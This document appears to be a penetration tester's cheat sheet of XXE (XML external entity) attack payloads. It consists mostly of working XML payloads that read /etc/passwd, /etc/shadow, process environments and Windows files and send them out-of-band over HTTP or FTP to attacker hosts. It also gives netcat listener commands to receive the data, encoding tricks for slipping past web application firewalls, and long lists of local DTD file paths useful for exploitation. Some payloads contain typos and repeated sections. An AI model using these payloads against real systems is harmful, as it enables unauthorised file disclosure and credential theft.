XXE Payloads

External DTD file
<!ENTITY % dtd SYSTEM "http://127.0.0.1/payload.dtd"> %dtd;
nc -lvp 80 < payload.dtd
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % all "<!ENTITY send SYSTEM http://127.0.0.1:4444/collect-%file;'>">
%all;
nc -lp 4444 > passwd
PHP PAYLOAD ON ERROR
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd">
<!ENTITY % all "<!ENTITY sebd SYSTEM http://127.0.0.1:4444/collect=%file;'>">
%all;


EXAMPLE GENERIC MALICIOUS XML
<?xml version="1.0" encoding="utf-8"?>
<?DOCTYPE harmless[
	<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<xxe>&xxe;</xxe>

OR

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://10.10.10.101:8080/test.txt">
]>
<r>&sp;</r>


EXAMPLE TYPE-EMBEDDED MALICIOUS XML
<?xml version="1.0" encoding="utf-8"?>
<?DOCTYPE title[
	<!ELEMENT something ANY>
	<!ENTITY thisthing SYSTEM "file:///etc/passwd">
]>
<something>passwd: %thisthing;</something>

Directory listing payload
<?xml version="1.0" encoding="utf-8"?>
<?DOCTYPE title[
	<!ELEMENT something ANY>
	<!ENTITY % file SYSTEM "file:///">
	<!ENTITY % ent "<!ENTITY data SYSTEM '%file;'>">
]>
<something>ls: %ent;</something>

BLIND XXE (error-based)
Test for filesystem access by requesting a non-existant file
Request payload:
<?xml version="1.0" ?>
<!DOCTYPE root [
<!ENTITY % ext SYSTEM "file:///etc/passwdxyz"> %ext;
]>
<r></r>
Vulnerable Response:
some variation of content is malformed or target file not accessible

Check for activity on loopback interface sockets
Request payload:
<?xml version="1.0" ?>
<!DOCTYPE root [
<!ENTITY % ext SYSTEM "http://localhost:22/"> %ext;
]>
<r></r>
Vulnerable Response:
Invalid Http response error message

Check for Protocol support
Request payload:
<?xml version="1.0" ?>
<!DOCTYPE root [ <!ENTITY % ext SYSTEM "arbitrary://localhost/"> %ext; ]>
<r></r>
Vulnerable Response:
unkown protocol error message

Test communication with internal domain network traffic
	-e.g. internal an jira or wiki service may return a non-error message and be routed to an external attacker
Request payload:
<?xml version="1.0" ?>
<!DOCTYPE root [
<!ENTITY % ext SYSTEM "http://enumeratedservice.target.dom/"> %ext;
]>
<r></r>
Vulnerable Response:
succesful access to http-hosted enumeratedservice or error for processing declarations
	-in the later case read access is enumerated, but discovered service formatting cannot be processed
		--unprocessed formats may included various markdown, non-html markup, compressed or git format files

External XML Stylesheet XXE
<?xml-stylesheet type="text/xml" href="http://attacker.dom/dtd.xml"?>
		
XInclude XXE
<document xmlns:xi="http://<IP>/XInclude"><footer><xi:include href="title.xml"/></footer></document>
<root xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include href="file:///etc/fstab" parse="text"/>

Inline XSLT
<?xml-stylesheet type="text/xml" href="#mytest"?>
<xsl:stylesheet id="mytest" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:fo="http://www.w3.org/1999/XSL/Format">
<!-- replace with your XSLT attacks -->
<xsl:import href="http://[ip]"/>
<xsl:template match="id('boom')">
  <fo:block font-weight="bold"><xsl:apply-templates/></fo:block>
</xsl:template>
</xsl:stylesheet>
		
Out-Of-Band XXE
	Verify OOB or Blind XXE
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://attacker.dom/test.txt">
]>
<r>&sp;</r>
	OOB Exfiltration
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://target.dom/ev.xml">
%sp;
%param1;
]>
<r>&exfil;</r>
	## External dtd:
<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://target.dom/?%data;'>">
	OOB Exfiltration (.NET target)
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "http://x.x.x.x:443/ev.xml">
%sp;
%param1;
%exfil;
]>
	## External dtd:
<!ENTITY % data SYSTEM "file:///c:/windows/win.ini">
<!ENTITY % param1 "<!ENTITY &#x25; exfil SYSTEM 'http://target.dom/?%data;'>">
	OOB exfiltration (variant)
<?xml version="1.0"?>
<!DOCTYPE r [
<!ENTITY % data3 SYSTEM "file:///etc/shadow">
<!ENTITY % sp SYSTEM "http://EvilHost:port/sp.dtd">
%sp;
%param3;
%exfil;
]>
	## External dtd:
<!ENTITY % param3 "<!ENTITY &#x25; exfil SYSTEM 'ftp://Evilhost:port/%data3;'>">
	OOB Exfiltratration (Java-based, ERROR-response)
<?xml version="1.0"?>
<!DOCTYPE r [
<!ENTITY % data3 SYSTEM "file:///etc/passwd">
<!ENTITY % sp SYSTEM "http://x.x.x.x:8080/ss5.dtd">
%sp;
%param3;
%exfil;
]>
<r></r>
	## External dtd:
<!ENTITY % param1 '<!ENTITY &#x25; external SYSTEM "file:///nothere/%payload;">'> %param1; %external;
	OOB Exfiltration (niceness)
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
<!ENTITY % start "<![CDATA[">
<!ENTITY % stuff SYSTEM "file:///usr/local/tomcat/webapps/customapp/WEB-INF/applicationContext.xml ">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://evil/evil.xml">
%dtd;
]>
<root>&all;</root>
	## External dtd:
<!ENTITY all "%start;%stuff;%end;">
	OOB Exfiltration (File-not-found exception-based)
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [  
<!ENTITY % one SYSTEM "http://attacker.tld/dtd-part" >
%one;
%two;
%four;
]>
	## External dtd:
<!ENTITY % three SYSTEM "file:///etc/passwd">
<!ENTITY % two "<!ENTITY % four SYSTEM 'file:///%three;'>">
	--may need to encode second % in final line of external dtd payload as &#%25
	OOB Exfiltration (FTP)
<?xml version="1.0" ?>
<!DOCTYPE a [ 
<!ENTITY % asd SYSTEM "http://x.x.x.x:4444/ext.dtd">
%asd;
%c;
]>
<a>&rrr;</a>
	## External dtd
<!ENTITY % d SYSTEM "file:///proc/self/environ">
<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://x.x.x.x:2121/%d;'>">
	OOB Exfiltration (Inside SOAP Body)
<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]></foo></soap:Body>
	OOBs (WAF bypasses)
<!DOCTYPE :. SYTEM "http://"
<!DOCTYPE :_-_: SYTEM "http://"
<!DOCTYPE {0xdfbf} SYSTEM "http://"
	
OoB extra ERROR - Java:
<?xml version="1.0"?>
<!DOCTYPE r [
<!ENTITY % data3 SYSTEM "file:///etc/passwd">
<!ENTITY % sp SYSTEM "http://x.x.x.x:8080/ss5.dtd">
%sp;
%param3;
%exfil;
]>
<r></r>
## External dtd: ##

<!ENTITY % param1 '<!ENTITY &#x25; external SYSTEM "file:///nothere/%payload;">'> %param1; %external;


OoB	- Asking for it
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [
 <!ENTITY % start "<![CDATA[">
 <!ENTITY % stuff SYSTEM "file:///usr/local/tomcat/webapps/customapp/WEB-INF/applicationContext.xml ">
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://evil/evil.xml">
%dtd;
]>
<root>&all;</root>
 
## External dtd: ##
 
<!ENTITY all "%start;%stuff;%end;">


File-not-found exception based extraction:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [  
  <!ENTITY % one SYSTEM "http://attacker.tld/dtd-part" >
  %one;
  %two;
  %four;
]>

## External dtd: ##

<!ENTITY % three SYSTEM "file:///etc/passwd">
<!ENTITY % two "<!ENTITY % four SYSTEM 'file:///%three;'>">

	^--'%' may require encoding, pending target
		&#x25;

FTP
<?xml version="1.0" ?>
<!DOCTYPE a [ 
<!ENTITY % asd SYSTEM "http://10.10.10.101:4444/ext.dtd">
%asd;
%c;
]>
<a>&rrr;</a>


## External dtd ##
<!ENTITY % d SYSTEM "file:///proc/self/environ">
<!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://10.10.10.101:2121/%d;'>">


Nested in SOAP body
<soap:Body><foo><![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://10.10.10.101:22/"> %dtd;]><xxx/>]]></foo></soap:Body>


	
LOCAL DTD



WAF Bypass techniques:
<!DOCTYPE :. SYTEM "http://"
<!DOCTYPE :_-_: SYTEM "http://"
<!DOCTYPE {0xdfbf} SYSTEM "http://"


ENCODED XML
	-bypass WAFs by encoding xml
echo -n '<?xml version="1.0" encoding="UTF-16BE"' >dtd.xml
echo '?><a>31337</a>' | iconv -f UTF-8 -t UTF-16BE >>dtd.xml
		--transcode a message body into UTF-16BE without a BOM [explanation follows] following a legal & expected ASCII XML declaration falsely declaring document encoding as UTF-16BE
	--cat dtd.xml | xxd
	---plaintext of encoding should appear to seperate standard unicode characters with '.' as a delimiter and hex representation should appear as a 16-bit character representation consisting of an 8-bit ascii character value followed by an 8-bit null value
		---UTF-16 Big Endian, therefore represents U+003F as 0x003F (00000000 00111111), operations beginning most significant WORD (byte-pair) 0x00 (00000000) in natural order -high byte transfered first-, which is therefore followed by (lower-addressed byte) 0x3f as 0x3f00; UTF-16LE would invert the ordering of a byte-pair sequence (lower byte preceding higher byte) as 0x003f
		---exceptions in both encoding being made for 4-byte surrogate pairs combining two common symbols from the reserved range U+D800 to U+DFFF one half (WORD/byte-pair) of which is not valid
			---In a surrogate pair each of the characters is inverted singly. This is designed for backwards compatibility with Unicode 1.0, where all symbols were encoded using two bytes only.
Parsers (WAFs in this case) detect an encoding in four ways:
	External information of encoding
		--generally for protocols built on the MIME standard (SMTP, HTTP, WebDav)
	Byte Order Mark (BOM)
		--a character with U+FEFF code
		---If a parser finds a BOM at the beginning of the document, then an encoding is determined by the binary code of the BOM
		Encoding 	BOM 									Example 	
		UTF-8 		EF BB BF 	EF BB BF 3C 3F 78 6D 6C 				...<?xml
		UTF-16BE 	FE FF 		FE FF 00 3C 00 3F 00 78 00 6D 00 6C 	...<.?.x.m.l
		UTF-16LE 	FF FE 		FF FE 3C 00 3F 00 78 00 6D 00 6C 00 	..<.?.x.m.l.
		---BOM only works at the beginning of the document. In the middle a BOM will be read as a special space
	By the first symbols of the document
		Encoding 	Document 	
		UTF-8
		ISO 646
		ASCII 		3C 3F 78 6D 	<?xm
		UTF-16BE 	00 3C 00 3F 	.<.?
		UTF-16LE 	3C 00 3F 00 	<.?.
		--only works for documents that start with an xml declaration
	From XML declaration
		<?xml version="1.0" encoding="UTF-8"?>
		--in order to read the declaration, a parser will have to know the encoding in which the declaration was written
		---declaration is useful to clarify between ASCII-compatible encodings
cat original.xml | iconv -f UTF-8 -t UTF-16BE > dtdencoded.xml
	--transcode a message body into UTF-16BE without a BOM
encode a document using two encodings simultaneously
	--when a parser reads an encoding from the XML-declaration, the parser immediately switches to it
		---WAFs don’t support parsing of such multi-encoded documents for now
an xml parser may or may not switch which encoding it's interpreting immediately after reading an encoding attribute delcaration later at the end of the element
	E.g. parses at end of declaration element (Xerces2 [Java Parser]):
		echo -n '<?xml version="1.0" encoding="UTF-16BE"?>' > payload.xml
		echo '<a>1337</a>' | iconv -f UTF-8 -t UTF-16BE >> payload.xml
	E.g. parses at end of encoding attribute (libxml2):
		echo -n '<?xml version="1.0" encoding="UTF-16BE"' > payload.xml
		echo '?><a>1337</a>' | iconv -f UTF-8 -t UTF-16BE >> payload.xml
	--A parser may be capabale of using many different encodings, check library source code to troubleshoot exploitation attempts with encoded payloads
	---UTF-7 and UTF-16 most commonly known encoding by parsers (other than ASCII and UTF-8, of course)


Character Data (CDATA) vs Parsed Character Data (PCDATA)
PCDATA is text that WILL be parsed by a parser. The text will be examined by the parser for entities and markup.
CDATA is text that will NOT be parsed by a parser.


Common linux .dtd files
(Linux)
/usr/lib/gap/pkg/GAPDoc-1.6.2/bibxmlext.dtd
/usr/lib/gap/pkg/GAPDoc-1.6.2/gapdoc.dtd
/usr/lib/libreoffice/share/dtd/officedocument/1_0/Manifest.dtd
/usr/lib/libreoffice/share/dtd/officedocument/1_0/accelerator.dtd
/usr/lib/libreoffice/share/dtd/officedocument/1_0/dialog.dtd
/usr/lib/libreoffice/share/dtd/officedocument/1_0/event.dtd
/usr/lib/libreoffice/share/dtd/officedocument/1_0/groupuinames.dtd
/usr/lib/libreoffice/share/dtd/officedocument/1_0/image.dtd
/usr/lib/libreoffice/share/dtd/officedocument/1_0/libraries.dtd
/usr/lib/libreoffice/share/dtd/officedocument/1_0/library.dtd
/usr/lib/libreoffice/share/dtd/officedocument/1_0/menubar.dtd
/usr/lib/libreoffice/share/dtd/officedocument/1_0/module.dtd
/usr/lib/libreoffice/share/dtd/officedocument/1_0/office.dtd
/usr/lib/libreoffice/share/dtd/officedocument/1_0/statusbar.dtd
/usr/lib/libreoffice/share/dtd/officedocument/1_0/toolbar.dtd
/usr/lib/vmware/libconf/etc/fonts/fonts.dtd
/usr/local/share/gdb/syscalls/gdb-syscalls.dtd
/usr/local/share/nmap/nmap.dtd
/usr/share/boostbook/dtd/1.1/boostbook.dtd
/usr/share/boostbook/dtd/boostbook.dtd
/usr/share/dblatex/schema/dblatex-config.dtd
/usr/share/doc/docutils-doc/docs/ref/docutils.dtd
/usr/share/doc/docutils-doc/docs/ref/soextblx.dtd
/usr/share/doc/sysstat/xml/sysstat-3.4.dtd.gz
/usr/share/djvu/pubtext/DjVuMessages.dtd
/usr/share/djvu/pubtext/DjVuOCR.dtd
/usr/share/djvu/pubtext/DjVuXML-s.dtd
/usr/share/gdb/syscalls/gdb-syscalls.dtd
/usr/share/glib-2.0/schemas/gschema.dtd
/usr/share/gtksourceview-2.0/language-specs/language.dtd
/usr/share/gtksourceview-3.0/language-specs/language.dtd
/usr/share/kde4/apps/katepart/syntax/language.dtd
/usr/share/kde4/apps/ksgmltools2/customization/dtd/kdex.dtd
/usr/share/libgda-5.0/dtd/libgda-paramlist.dtd
/usr/share/libgda-5.0/dtd/libgda-server-operation.dtd
/usr/share/libgweather/locations.dtd
/usr/share/liteide/liteeditor/kate/language.dtd
/usr/share/lv2specgen/DTD/xhtml-basic11.dtd
/usr/share/mobile-broadband-provider-info/serviceproviders.2.dtd
/usr/share/nmap/nmap.dtd
/usr/share/sgml/dtd/fo.dtd
/usr/share/sgml/dtd/mod-general.dtd
/usr/share/sgml/dtd/qaml-xml.dtd
/usr/share/sgml/dtd/rdf.dtd
/usr/share/sgml/dtd/svg10.dtd
/usr/share/sgml/dtd/svg11.dtd
/usr/share/sgml/dtd/xml-core/catalog.dtd
/usr/share/sgml/gconf/gconf-1.0.dtd
/usr/share/sgml/html/dtd/html-0.dtd
/usr/share/sgml/html/dtd/html-0s.dtd
/usr/share/sgml/html/dtd/html-1.dtd
/usr/share/sgml/html/dtd/html-1s.dtd
/usr/share/sgml/html/dtd/html-2.1e.dtd
/usr/share/sgml/html/dtd/html-3.2.dtd
/usr/share/sgml/html/dtd/html-3.dtd
/usr/share/sgml/html/dtd/html-3s.dtd
/usr/share/sgml/html/dtd/html-970421.dtd
/usr/share/sgml/html/dtd/html-hj.dtd
/usr/share/sgml/html/dtd/html-hjs.dtd
/usr/share/sgml/html/dtd/html-mcom.dtd
/usr/share/sgml/html/dtd/html-mcoms.dtd
/usr/share/sgml/html/dtd/html-s.dtd
/usr/share/sgml/html/dtd/html.dtd
/usr/share/sgml/html/dtd/ie-2.0-tables.dtd
/usr/share/sgml/html/dtd/ie-2.0.dtd
/usr/share/sgml/html/dtd/ie-2.0s.dtd
/usr/share/sgml/html/dtd/ie-3.0-tables.dtd
/usr/share/sgml/html/dtd/ie-3.0.dtd
/usr/share/sgml/html/dtd/ie-3.0s.dtd
/usr/share/sgml/html/dtd/4.0/frameset.dtd
/usr/share/sgml/html/dtd/4.0/loose.dtd
/usr/share/sgml/html/dtd/4.0/strict.dtd
/usr/share/sgml/html/dtd/4.01/frameset.dtd
/usr/share/sgml/html/dtd/4.01/loose.dtd
/usr/share/sgml/html/dtd/4.01/strict.dtd
/usr/share/sgml/html/dtd/iso-15445/15445.dtd
/usr/share/texinfo/texinfo.dtd
/usr/share/texlive/texmf-dist/tex4ht/xtpipes/xtpipes.dtd
/usr/share/texlive/texmf-dist/tex4ht/xtpipes/xtpipes-map.dtd
/usr/share/X11/xkb/rules/xkb.dtd
/usr/share/xml/dbus-1/introspect.dtd
/usr/share/xml/dbus-1/busconfig.dtd
/usr/share/xml/docbook/schema/dtd/4.0/calstblx.dtd
/usr/share/xml/docbook/schema/dtd/4.0/docbookx.dtd
/usr/share/xml/docbook/schema/dtd/4.0/soextblx.dtd
/usr/share/xml/docbook/schema/dtd/4.1.2/calstblx.dtd
/usr/share/xml/docbook/schema/dtd/4.1.2/docbookx.dtd
/usr/share/xml/docbook/schema/dtd/4.1.2/soextblx.dtd
/usr/share/xml/docbook/schema/dtd/4.2/calstblx.dtd
/usr/share/xml/docbook/schema/dtd/4.2/docbookx.dtd
/usr/share/xml/docbook/schema/dtd/4.2/soextblx.dtd
/usr/share/xml/docbook/schema/dtd/4.3/calstblx.dtd
/usr/share/xml/docbook/schema/dtd/4.3/docbookx.dtd
/usr/share/xml/docbook/schema/dtd/4.3/soextblx.dtd
/usr/share/xml/docbook/schema/dtd/4.4/calstblx.dtd
/usr/share/xml/docbook/schema/dtd/4.4/docbookx.dtd
/usr/share/xml/docbook/schema/dtd/4.4/soextblx.dtd
/usr/share/xml/docbook/schema/dtd/4.5/calstblx.dtd
/usr/share/xml/docbook/schema/dtd/4.5/docbookx.dtd
/usr/share/xml/docbook/schema/dtd/4.5/soextblx.dtd
/usr/share/xml/docbook/stylesheet/docbook-xsl/common/l10n.dtd
/usr/share/xml/docbook/stylesheet/docbook-xsl/common/targetdatabase.dtd
/usr/share/xml/docbook/stylesheet/docbook-xsl/roundtrip/blocks2dbk.dtd
/usr/share/xml/docutils/docutils.dtd
/usr/share/xml/docutils/soextblx.dtd
/usr/share/xml/fontconfig/fonts.dtd
/usr/share/xml/schema/xml-core/catalog.dtd
/usr/share/xml/schema/xml-core/tr9401.dtd
/usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd
/usr/share/xml/libglade/glade-2.0.dtd
/usr/share/xml/qaml/qaml-xml.dtd
/usr/share/xml/svg/svg10.dtd
/usr/share/xml/svg/svg11.dtd
/usr/share/yelp/dtd/docbookx.dtd
/usr/lib64/erlang/lib/docbuilder-0.9.8.11/dtd/application.dtd
(Java)
/usr/share/maven-repo/
./.m2/repository
../.m2/repository
../../.m2/repository
../../../.m2/repository
../../../../.m2/repository
./properties/schemas/j2ee/XMLSchema.dtd
./../properties/schemas/j2ee/XMLSchema.dtd
./../../properties/schemas/j2ee/XMLSchema.dtd
/opt/jboss/wildfly/modules/system/layers/base/org/apache/lucene/main/lucene-queryparser-5.5.5.jar!/org/apache/lucene/queryparser/xml/LuceneCoreQuery.dtd
/opt/jboss/wildfly/modules/system/layers/base/org/apache/xml-resolver/main/xml-resolver-1.2.jar!/org/apache/xml/resolver/etc/catalog.dtd
/opt/jboss/wildfly/modules/system/layers/base/org/jboss/security/xacml/main/jbossxacml-2.0.8.Final.jar!/schema/xmlschema/XMLSchema.dtd
/opt/jboss/wildfly/modules/system/layers/base/org/picketlink/federation/main/picketlink-federation-2.5.5.SP12.jar!/schema/w3c/xmlschema/XMLSchema.dtd
/opt/jboss-5.1.0.GA/docs/dtd/jboss-client_4_0.dtd
/opt/jboss-5.1.0.GA/docs/dtd/jboss-client_4_2.dtd
/opt/jboss-5.1.0.GA/docs/dtd/jboss-client_5_0.dtd
/opt/jboss-5.1.0.GA/docs/dtd/jboss-web_4_0.dtd
/opt/jboss-5.1.0.GA/docs/dtd/jboss-web_4_2.dtd
/opt/jboss-5.1.0.GA/docs/dtd/jboss-web_5_0.dtd
/opt/jboss-5.1.0.GA/docs/dtd/jboss_4_0.dtd
/opt/jboss-5.1.0.GA/docs/dtd/jboss_4_2.dtd
/opt/jboss-5.1.0.GA/docs/dtd/jboss_5_0.dtd
/opt/jboss-5.1.0.GA/docs/dtd/web-facesconfig_1_0.dtd
/opt/jboss-5.1.0.GA/docs/dtd/web-facesconfig_1_1.dtd
/opt/sas/sw/tomcat/shared/lib/jsp-api.jar!/javax/servlet/jsp/resources/jspxml.dtd
/usr/share/doc/openjdk-11-jre-headless/api/java.desktop/javax/swing/plaf/synth/doc-files/synth.dtd.gz
/usr/local/tomcat/lib/tomcat-coyote.jar!/org/apache/tomcat/util/modeler/mbeans-descriptors.dtd
/usr/share/sgml/apache/jakarta/validator/validator_1_0.dtd
/usr/share/sgml/apache/jakarta/validator/validator_1_0_1.dtd
/usr/share/sgml/apache/jakarta/validator/validator_1_1.dtd
/usr/share/sgml/apache/jakarta/validator/validator_1_1_3.dtd
/usr/share/sgml/apache/jakarta/validator/validator_1_2_0.dtd
/usr/share/sgml/apache/jakarta/validator/validator_1_3_0.dtd
/usr/share/sgml/apache/jakarta/validator/validator_1_4_0.dtd
/usr/share/java/jsp-api-2.2.jar!/javax/servlet/jsp/resources/jspxml.dtd
/usr/share/java/jsp-api-2.3.jar!/javax/servlet/jsp/resources/jspxml.dtd
/usr/share/maven-repo/javax/servlet/jsp/jsp-api/2.0/jsp-api-2.0.jar!/javax/servlet/jsp/resources/jspxml.dtd
/usr/share/maven-repo/javax/servlet/jsp/jsp-api/2.1/jsp-api-2.1.jar!/javax/servlet/jsp/resources/jspxml.dtd
/usr/share/maven-repo/javax/servlet/jsp/jsp-api/2.1.1/jsp-api-2.1.1.jar!/javax/servlet/jsp/resources/jspxml.dtd
/usr/share/maven-repo/javax/servlet/jsp/jsp-api/2.1.2/jsp-api-2.1.2.jar!/javax/servlet/jsp/resources/jspxml.dtd
/usr/share/maven-repo/javax/servlet/jsp/jsp-api/2.2/jsp-api-2.2.jar!/javax/servlet/jsp/resources/jspxml.dtd
/usr/share/struts/struts-config_1_0.dtd
(JavaScript)
/usr/share/doc/libjs-xmlextras/examples/buddy.dtd
(Perl)
/usr/share/doc/libxml-libxml-perl/examples/bad.dtd
/usr/share/doc/libxml-libxml-perl/examples/ext_ent.dtd
/usr/share/doc/libxml-libxml-perl/examples/test.dtd
/usr/share/doc/libxml-libxml-perl/examples/complex/complex.dtd
/usr/share/doc/libxml-libxml-perl/examples/complex/dtd/f.dtd
/usr/share/doc/libxml-libxml-perl/examples/complex/dtd/g.dtd
/usr/share/doc/libxml-parser-perl/examples/ctest.dtd
(PHP)
/usr/share/php/data/PEAR/package.dtd
(Python)
/opt/anaconda2/share/xml/fontconfig/fonts.dtd
/opt/anaconda2/pkgs/fontconfig-2.11.1-5/share/xml/fontconfig/fonts.dtd
/root/usr/share/doc/rh-python34-python-docutils-0.12/docs/ref/docutils.dtd
/root/usr/share/doc/rh-python35-python-docutils-0.12/docs/ref/docutils.dtd
/usr/share/dblatex/schema/dblatex-config.dtd
/usr/lib/python3/dist-packages/astropy/io/votable/data/VOTable.dtd
/usr/share/doc/docutils-doc/docs/dev/pysource.dtd
/usr/share/doc/rh-python34-python-docutils-0.12/docs/ref/docutils.dtd
/usr/share/doc/rh-python35-python-docutils-0.12/docs/ref/docutils.dtd
/usr/share/doc/python2-docutils/docs/ref/docutils.dtd
(R)
/opt/anaconda2/share/xml/fontconfig/fonts.dtd
/opt/anaconda2/pkgs/fontconfig-2.11.1-5/share/xml/fontconfig/fonts.dtd
/usr/share/doc/r-cran-xml2/tests/testthat/records.dtd


Common Windows .dtd files
\Windows\System32\wbem\xml\cim20.dtd
\Windows\System32\wbem\xml\wim20.dtd
\Windows\System32\xwizard.dtd
\Windows\SysWOW64\wbem\xml\cim20.dtd
\Windows\SysWOW64\wbem\xml\xim20.dtd
\Windows\SysWOW64\xwizard.dtd
\Program%20Files%20(x86)\Lotus\Notes\domino.dtd
\Program%20Files\Lotus\Notes\domino.dtd